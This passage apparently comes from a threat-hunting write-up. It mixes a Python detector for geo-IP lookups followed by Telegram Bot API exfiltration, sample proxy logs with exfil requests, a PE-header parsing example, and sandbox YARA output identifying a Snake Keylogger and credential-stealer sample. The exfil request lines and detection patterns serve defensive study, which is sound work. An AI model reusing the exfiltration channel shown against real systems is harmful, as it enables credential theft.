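2024-11-25T10:01:03Z WKS-17 GET https://www.office.com/
2024-11-25T10:01:09Z WKS-17 POST https://api.telegram.org/bot123456789:AAExampleTokenNotReal/sendDocument
2024-11-25T10:02:00Z WKS-22 GET https://reallyfreegeoip.org/xml/
2024-11-25T10:40:00Z WKS-22 POST https://api.telegram.org/bot987654321:AAExampleTokenNotReal/sendMessage
2024-11-25T10:03:00Z WKS-31 GET https://duckduckgo.com/ac/?q=test
"""

# reallyfreegeoip.org is the service seen in the report; the others are common
# equivalents added as an assumption so the rule generalises.
GEOIP_RE = re.compile(
    r"^https?://(?:www\.)?(reallyfreegeoip\.org|ip-api\.com|api\.ipify\.org|checkip\.dyndns\.org)/",
    re.IGNORECASE,
)
# Bot API calls look like https://api.telegram.org/bot<id>:<token>/<method>
TELEGRAM_RE = re.compile(
    r"^https?://api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(send\w+|getMe|getUpdates)",
    re.IGNORECASE,
)


def parse_line(line: str) -> Event:
    ts, host, method, url = line.split(maxsplit=3)
    return Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, method, url)


def redact_bot_token(url: str) -> str:
    """The token is a credential for the attacker's channel; never copy it into a ticket."""
    return re.sub(r"/bot\d+:[A-Za-z0-9_-]+/", "/bot<redacted>/", url)


def find_geoip_then_telegram(
    log_text: str, window: timedelta = timedelta(minutes=10)
) -> List[Tuple[str, str, str, int]]:
    """Return (host, geoip_url, telegram_url, seconds_between) for every external-IP
    lookup that is followed by a Telegram Bot API call from the same host within `window`."""
    by_host = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ev = parse_line(line)
            by_host[ev.host].append(ev)

    hits = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e.ts)
        lookups = [e for e in events if GEOIP_RE.match(e.url)]
        bot_calls = [e for e in events if TELEGRAM_RE.match(e.url)]
        for lookup in lookups:
            for call in bot_calls:
                delta = call.ts - lookup.ts
                if timedelta(0) <= delta <= window:
                    hits.append((host, lookup.url, redact_bot_token(call.url), int(delta.total_seconds())))
                    break  # one alert per lookup is enough
    return hits


if __name__ == "__main__":
    for hit in find_geoip_then_telegram(SAMPLE_PROXY_LOG):
        print("geoip-then-telegram: host=%s lookup=%s exfil=%s after %ds" % hit)
```

With the default ten-minute window only WKS-17 is flagged; WKS-22 performs both steps but 38 minutes apart, so it is left for the wider-window hunt query rather than the real-time alert. The TLS-only evidence in the report (a 443 session to a Telegram address, no hostname) means the same logic should also be fed from TLS SNI or DNS logs where the proxy does not see the URL.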
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

                    System Summary

                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: MC8017774DOCS.exe PID: 4488, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | File created: C:\Windows\resources\0809
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_00404C7B
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 0_2_6E9B1B63
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 4_2_03E43AAC
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 4_2_03E4B978
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 4_2_03E44BC8
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 4_2_03E41B4C
                    Source: C:\Users\user\Desktop\MC8017774DOCS.exe | Code function: 4_2_03E469D1
                    Source: MC8017774DOCS.exe, 00000004.00000003.2639623192.0000000035F05000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMsMpLics.dllj% vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3478413317.0000000034DB5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3476036769.0000000033A77000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3450065086.000000000006F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameAubriella.exe4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe, 00000004.00000002.3480673346.00000000360E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs MC8017774DOCS.exe
                    Source: MC8017774DOCS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
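The "Static PE information" row is a decoded IMAGE_FILE_HEADER.Characteristics field. The following added example (not from the report, and not Joe Sandbox code) parses that field from an MZ/PE header and names the flags the way the row does; the header bytes it parses are built by a helper for the example, and nothing is read from MC8017774DOCS.exe. The flag table covers the bits sandbox reports commonly print; anything else is reported as an unknown bit rather than dropped.

```python
"""Decode IMAGE_FILE_HEADER.Characteristics as shown in a "Static PE information" row.

Added example, not from the report. The MZ/PE header bytes are constructed by
build_header() for the example; nothing is read from MC8017774DOCS.exe.
"""
import struct
from typing import List, Tuple

# IMAGE_FILE_* flag bits from winnt.h; the ones sandbox reports commonly print.
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}


def pe_file_header(data: bytes) -> Tuple[str, List[str]]:
    """Return (machine name, characteristic flag names) for an MZ/PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if len(data) < e_lfanew + 24 or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # IMAGE_FILE_HEADER (20 bytes) follows the 4-byte signature:
    #   Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    #   NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    machine, flags = struct.unpack_from("<H16xH", data, e_lfanew + 4)
    names = [name for bit, name in sorted(CHARACTERISTICS.items()) if flags & bit]
    leftover = flags & ~sum(CHARACTERISTICS.keys()) & 0xFFFF
    if leftover:
        names.append("UNKNOWN_0x%04X" % leftover)
    return MACHINES.get(machine, "0x%04X" % machine), names


def build_header(flags: int, machine: int = 0x014C) -> bytes:
    """Constructed minimal header (DOS header + PE signature + file header, no sections)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    file_header = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, 0, flags)
    return dos_header + b"PE\0\0" + file_header


def can_be_rebased(flag_names: List[str]) -> bool:
    """False when relocations were stripped: the loader cannot move the image, so it
    lands at its preferred base regardless of ASLR settings in the optional header."""
    return "RELOCS_STRIPPED" not in flag_names


if __name__ == "__main__":
    # 0x010F reproduces the flag set the report prints for MC8017774DOCS.exe.
    machine, names = pe_file_header(build_header(0x010F))
    print(machine, ", ".join(names), "rebasable=%s" % can_be_rebased(names))
```

For the first stage here the interesting bit is RELOCS_STRIPPED: the dropper image cannot be relocated, which is normal for a small installer stub but also means the stage-0 code sits at a fixed address in every run, a property the sandbox's per-run function addresses (0_2_0040336C and friends) already reflect.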
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.360e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.b096e.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.360e0f20.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 4.2.MC8017774DOCS.exe.afa4e.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 4.2.MC8017774DOCS.exe.36720000.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
